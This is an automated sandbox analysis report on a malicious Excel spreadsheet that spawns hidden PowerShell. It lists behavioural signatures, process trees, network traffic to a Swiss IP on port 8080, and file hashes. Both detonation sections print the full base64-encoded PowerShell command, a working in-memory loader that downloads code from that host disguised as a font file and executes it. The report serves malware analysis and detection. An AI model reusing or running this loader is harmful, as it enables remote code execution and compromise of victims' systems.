Analysis Overview
SHA256
5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f
Threat Level: Known bad
The file 5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Office macro that triggers on suspicious action
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
System Location Discovery: System Language Discovery
Office loads VBA resources, possible macro or embedded object present
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of FindShellTrayWindow
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 21:58
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 21:58
Reported
2024-11-13 21:59
Platform
win7-20241023-en
Max time kernel
16s
Max time network
17s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp"
Network
| Country | Destination | Domain | Proto |
| CH | 194.182.164.149:8080 | tcp |
Files
memory/2988-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2988-1-0x000000007202D000-0x0000000072038000-memory.dmp
memory/2988-2-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-3-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-8-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-9-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-7-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-6-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-4-0x0000000000200000-0x0000000000300000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.cmdline
| MD5 | cc13bf030191cde69868e4b27e748256 |
| SHA1 | 7a985d84475dabb80d02aac739d3b24124e1d20c |
| SHA256 | bb060f760a5b9ec469bb5f563ab0944aa837dae50f535a082465130d8da889ab |
| SHA512 | ff24139b79333a0ec3f99c72074c69cee411133f3964431620280a7df60a4ad7e5104cfd94a0f16c3975e1ef246a4ce9e5ae7d82cf51dcf389ae6b9b837fbd12 |
\??\c:\Users\Admin\AppData\Local\Temp\ztdg0y54.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
| SHA512 | 8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d |
\??\c:\Users\Admin\AppData\Local\Temp\CSCC5A0.tmp
| MD5 | dc9eb10b07859e23d805cc32941918e7 |
| SHA1 | 757fb1eb624141296c5c69383e573d6b886e5eb6 |
| SHA256 | 792dd3954357714c0f76dcfdf5a82e73e74478716d9a44ec96a9c5295447675b |
| SHA512 | 1be67799830ed882664a33741f9d6ef1f821a0169741fd97b3d22341f181de696d803a05536de8746f8c82d96d12e8931df27a7ed8f66a754be5808a7be1d7ae |
C:\Users\Admin\AppData\Local\Temp\RESC5A1.tmp
| MD5 | 96d3563fa093dde2099b93fb6f3c6053 |
| SHA1 | 0053ec01c09a73af92c1d1c03e44a3ca674cc5e4 |
| SHA256 | 6ef59f115a4c4f3c25ffe171be2b86371e6084fdee179ccd4cb1bc29caf966a4 |
| SHA512 | eb8052443bd3e88bf5758a0cddf9134568313fa6aaed150e0e26fe4bf2bf9a25d72198e353b4a6a81e7d836d9dfa41c40398b03225c11615f267acc6dcb9961a |
C:\Users\Admin\AppData\Local\Temp\ztdg0y54.dll
| MD5 | ded5c1d028402a58f25356d5965eb33e |
| SHA1 | 2cc7c6327e2f806c33e71ac97bbc47815302f105 |
| SHA256 | 252bd54f2c4f254693a739af65427f62c3f4d8b59514613c332848fb7b836ecf |
| SHA512 | 6073aa86fc95cdeeaf59ec176c1489e90716b28d5ea4a0c43ee3a752a517886774b03871ec6f02eb4de46bcc9bd3254b7794ae35e2bafb67285aec4b1736b8f2 |
C:\Users\Admin\AppData\Local\Temp\ztdg0y54.pdb
| MD5 | 8086a47d28b8c125c8392c53f127ea57 |
| SHA1 | 228a87d4f7f611ff1c147911c08b736f4ffd2490 |
| SHA256 | aca9e9e7902195692dc83d27dff689bb400e90c3ac9a1f286956bbf75b1407b6 |
| SHA512 | a3e316420fe3f743a88dc253bd11525cb00559dd025b4c0be44541e68c4ac049eb1e8c15edbe90aefc273a8db3025e83bbd54b940fee772577032322218304a5 |
memory/2988-27-0x000000007202D000-0x0000000072038000-memory.dmp
memory/2988-28-0x0000000000200000-0x0000000000300000-memory.dmp
memory/2988-29-0x0000000000200000-0x0000000000300000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 21:58
Reported
2024-11-13 21:59
Platform
win10v2004-20241007-en
Max time kernel
36s
Max time network
37s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 832 wrote to memory of 5036 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 832 wrote to memory of 5036 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5036 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 5036 wrote to memory of 4888 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
| PID 4888 wrote to memory of 4080 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
| PID 4888 wrote to memory of 4080 | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\5d58e758e728ee4df1f238864186431de63a8b38508c427f53abd07c8c9fb95f.xls"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87ED.tmp" "c:\Users\Admin\AppData\Local\Temp\4sxb5iel\CSC6226AC086F4E495C90E0385C98AC523.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| CH | 194.182.164.149:8080 | tcp | |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.72.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.209.201.84.in-addr.arpa | udp |
Files
memory/832-1-0x00007FFCF728D000-0x00007FFCF728E000-memory.dmp
memory/832-0-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp
memory/832-3-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp
memory/832-5-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp
memory/832-4-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp
memory/832-2-0x00007FFCB7270000-0x00007FFCB7280000-memory.dmp
memory/832-8-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-7-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-6-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-12-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-11-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-10-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-13-0x00007FFCB4910000-0x00007FFCB4920000-memory.dmp
memory/832-9-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-14-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-19-0x00007FFCB4910000-0x00007FFCB4920000-memory.dmp
memory/832-18-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-22-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-21-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-20-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-17-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-16-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-15-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-26-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/832-27-0x00007FFCF71F0000-0x00007FFCF73E5000-memory.dmp
memory/5036-35-0x000002C19C130000-0x000002C19C152000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lu1ik0h3.sa5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.cmdline
| MD5 | abd0f1fd39b5de26bd9e8862a72323c9 |
| SHA1 | ac9c21f480c303e11d624c61c1bb43f19e4479af |
| SHA256 | bcfcf13672297034438c1ff300c742f0c2979ece919998bec71be0ce3d3b688e |
| SHA512 | 9aeaa37daee48bcc70c118e4991cb8603c7a578bf977de59dd3968235733aedf19d2cba9d7e5a5e769ab0fa9f209e2e419e2663e1eee529569def5560434c0ca |
\??\c:\Users\Admin\AppData\Local\Temp\4sxb5iel\4sxb5iel.0.cs
| MD5 | f4dd5c682eb7b3b679f084261bfc7c4c |
| SHA1 | 70f75d7a4e42c185eb09139ed3c6f7338a2219c2 |
| SHA256 | 2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319 |
